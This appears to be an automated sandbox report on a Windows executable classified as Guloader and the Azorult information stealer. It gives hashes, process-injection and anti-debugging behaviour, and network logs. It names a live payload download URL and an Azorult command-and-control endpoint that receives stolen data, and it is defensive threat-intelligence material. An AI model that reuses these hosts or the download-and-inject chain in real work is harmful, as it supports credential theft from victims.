Analysis
-
max time kernel
53s -
max time network
59s -
platform
windows7_x64 -
resource
win7-20241010-en -
resource tags
arch:x64arch:x86image:win7-20241010-enlocale:en-usos:windows7-x64system -
submitted
19-11-2024 17:17
Static task
static1
Behavioral task
behavioral1
Sample
27ab1252f52866eca728cdbaaf3dcf4ba9c6c0b14a1d8c8973eb13ab2850cb2b.exe
Resource
win7-20241010-en
Behavioral task
behavioral2
Sample
27ab1252f52866eca728cdbaaf3dcf4ba9c6c0b14a1d8c8973eb13ab2850cb2b.exe
Resource
win10v2004-20241007-en
Behavioral task
behavioral3
Sample
$PLUGINSDIR/System.dll
Resource
win7-20241010-en
Behavioral task
behavioral4
Sample
$PLUGINSDIR/System.dll
Resource
win10v2004-20241007-en
General
-
Target
27ab1252f52866eca728cdbaaf3dcf4ba9c6c0b14a1d8c8973eb13ab2850cb2b.exe
-
Size
543KB
-
MD5
e555bbbffc72df8a3b14eafd48f36bbc
-
SHA1
322db6d82578f212e8fb18c7880e9f9de44580b4
-
SHA256
27ab1252f52866eca728cdbaaf3dcf4ba9c6c0b14a1d8c8973eb13ab2850cb2b
-
SHA512
a9ef31c67cc9e4c5c0ade06d37447978228e967139717b2201eb7acf67d17a5c556cc19927c8d5791b0022f8e3f259730cd85ae841806ef9f7e9234a113b0270
-
SSDEEP
12288:32EI5cRYSzvuwIkyXS9bVVsKZIUvhnmd3ZhZw:3w6RfJIRIVaKZnmdPZw
Malware Config
Extracted
azorult
http://mhlc.shop/GI341/index.php
Signatures
-
Azorult
An information stealer that was first discovered in 2016, targeting browsing history and passwords.
-
Azorult family
-
Guloader family
-
Guloader,Cloudeye
A shellcode based downloader first seen in 2020.
-
Loads dropped DLL 1 IoCs
pid Process 2548 27ab1252f52866eca728cdbaaf3dcf4ba9c6c0b14a1d8c8973eb13ab2850cb2b.exe -
Suspicious use of NtCreateThreadExHideFromDebugger 1 IoCs
pid Process 2964 27ab1252f52866eca728cdbaaf3dcf4ba9c6c0b14a1d8c8973eb13ab2850cb2b.exe -
Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs
pid Process 2548 27ab1252f52866eca728cdbaaf3dcf4ba9c6c0b14a1d8c8973eb13ab2850cb2b.exe 2964 27ab1252f52866eca728cdbaaf3dcf4ba9c6c0b14a1d8c8973eb13ab2850cb2b.exe -
Suspicious use of SetThreadContext 1 IoCs
description pid Process procid_target PID 2548 set thread context of 2964 2548 27ab1252f52866eca728cdbaaf3dcf4ba9c6c0b14a1d8c8973eb13ab2850cb2b.exe 30 -
Drops file in Windows directory 1 IoCs
description ioc Process File opened for modification C:\Windows\resources\0409\slnger\barometerstandenes.san 27ab1252f52866eca728cdbaaf3dcf4ba9c6c0b14a1d8c8973eb13ab2850cb2b.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
System Location Discovery: System Language Discovery 1 TTPs 2 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 27ab1252f52866eca728cdbaaf3dcf4ba9c6c0b14a1d8c8973eb13ab2850cb2b.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 27ab1252f52866eca728cdbaaf3dcf4ba9c6c0b14a1d8c8973eb13ab2850cb2b.exe -
Suspicious behavior: MapViewOfSection 1 IoCs
pid Process 2548 27ab1252f52866eca728cdbaaf3dcf4ba9c6c0b14a1d8c8973eb13ab2850cb2b.exe -
Suspicious use of WriteProcessMemory 6 IoCs
description pid Process procid_target PID 2548 wrote to memory of 2964 2548 27ab1252f52866eca728cdbaaf3dcf4ba9c6c0b14a1d8c8973eb13ab2850cb2b.exe 30 PID 2548 wrote to memory of 2964 2548 27ab1252f52866eca728cdbaaf3dcf4ba9c6c0b14a1d8c8973eb13ab2850cb2b.exe 30 PID 2548 wrote to memory of 2964 2548 27ab1252f52866eca728cdbaaf3dcf4ba9c6c0b14a1d8c8973eb13ab2850cb2b.exe 30 PID 2548 wrote to memory of 2964 2548 27ab1252f52866eca728cdbaaf3dcf4ba9c6c0b14a1d8c8973eb13ab2850cb2b.exe 30 PID 2548 wrote to memory of 2964 2548 27ab1252f52866eca728cdbaaf3dcf4ba9c6c0b14a1d8c8973eb13ab2850cb2b.exe 30 PID 2548 wrote to memory of 2964 2548 27ab1252f52866eca728cdbaaf3dcf4ba9c6c0b14a1d8c8973eb13ab2850cb2b.exe 30
Processes
-
C:\Users\Admin\AppData\Local\Temp\27ab1252f52866eca728cdbaaf3dcf4ba9c6c0b14a1d8c8973eb13ab2850cb2b.exe"C:\Users\Admin\AppData\Local\Temp\27ab1252f52866eca728cdbaaf3dcf4ba9c6c0b14a1d8c8973eb13ab2850cb2b.exe"1⤵
- Loads dropped DLL
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of SetThreadContext
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
- Suspicious behavior: MapViewOfSection
- Suspicious use of WriteProcessMemory
PID:2548 -
C:\Users\Admin\AppData\Local\Temp\27ab1252f52866eca728cdbaaf3dcf4ba9c6c0b14a1d8c8973eb13ab2850cb2b.exe"C:\Users\Admin\AppData\Local\Temp\27ab1252f52866eca728cdbaaf3dcf4ba9c6c0b14a1d8c8973eb13ab2850cb2b.exe"2⤵
- Suspicious use of NtCreateThreadExHideFromDebugger
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
PID:2964
-
Network
-
Remote address:8.8.8.8:53Requestmertvinc.com.trIN AResponsemertvinc.com.trIN A185.244.144.68
-
GEThttp://mertvinc.com.tr/LAbxmTzNBCWjnKNdG58.bin27ab1252f52866eca728cdbaaf3dcf4ba9c6c0b14a1d8c8973eb13ab2850cb2b.exeRemote address:185.244.144.68:80RequestGET /LAbxmTzNBCWjnKNdG58.bin HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
Host: mertvinc.com.tr
Cache-Control: no-cache
ResponseHTTP/1.1 200 OK
Content-Type: application/octet-stream
Last-Modified: Mon, 11 Nov 2024 12:17:10 GMT
Etag: "1c040-6731f5c6-3fa9fa73f7b85d5c;;;"
Accept-Ranges: bytes
Content-Length: 114752
Date: Tue, 19 Nov 2024 16:24:57 GMT
Server: LiteSpeed
X-Powered-By: PleskLin
-
Remote address:8.8.8.8:53Requestmhlc.shopIN AResponsemhlc.shopIN A172.67.208.107mhlc.shopIN A104.21.23.20
-
POSThttp://mhlc.shop/GI341/index.php27ab1252f52866eca728cdbaaf3dcf4ba9c6c0b14a1d8c8973eb13ab2850cb2b.exeRemote address:172.67.208.107:80RequestPOST /GI341/index.php HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0b; Windows NT 5.1)
Host: mhlc.shop
Content-Length: 99
Cache-Control: no-cache
ResponseHTTP/1.1 403 Forbidden
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
X-Frame-Options: SAMEORIGIN
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Nmm%2FxT3HWFYVQbLZJt6gMi2n4fHm63j%2B2pCGy%2F9%2FMuxK20HadSeVtv7ZyxEeehZ4I371y7RweCOnSgTLADT9h9b9LFQNHZ%2FRzsOMa8AK%2BCRVF%2FmWBa90q0%2FmPww%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8e51dbfc38f3be3e-DUB
-
185.244.144.68:80http://mertvinc.com.tr/LAbxmTzNBCWjnKNdG58.binhttp27ab1252f52866eca728cdbaaf3dcf4ba9c6c0b14a1d8c8973eb13ab2850cb2b.exe2.4kB 118.6kB 48 88
HTTP Request
GET http://mertvinc.com.tr/LAbxmTzNBCWjnKNdG58.binHTTP Response
200 -
172.67.208.107:80http://mhlc.shop/GI341/index.phphttp27ab1252f52866eca728cdbaaf3dcf4ba9c6c0b14a1d8c8973eb13ab2850cb2b.exe582 B 5.5kB 7 9
HTTP Request
POST http://mhlc.shop/GI341/index.phpHTTP Response
403
-
61 B 77 B 1 1
DNS Request
mertvinc.com.tr
DNS Response
185.244.144.68
-
55 B 87 B 1 1
DNS Request
mhlc.shop
DNS Response
172.67.208.107104.21.23.20
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
11KB
MD575ed96254fbf894e42058062b4b4f0d1
SHA1996503f1383b49021eb3427bc28d13b5bbd11977
SHA256a632d74332b3f08f834c732a103dafeb09a540823a2217ca7f49159755e8f1d7
SHA51258174896db81d481947b8745dafe3a02c150f3938bb4543256e8cce1145154e016d481df9fe68dac6d48407c62cbe20753320ebd5fe5e84806d07ce78e0eb0c4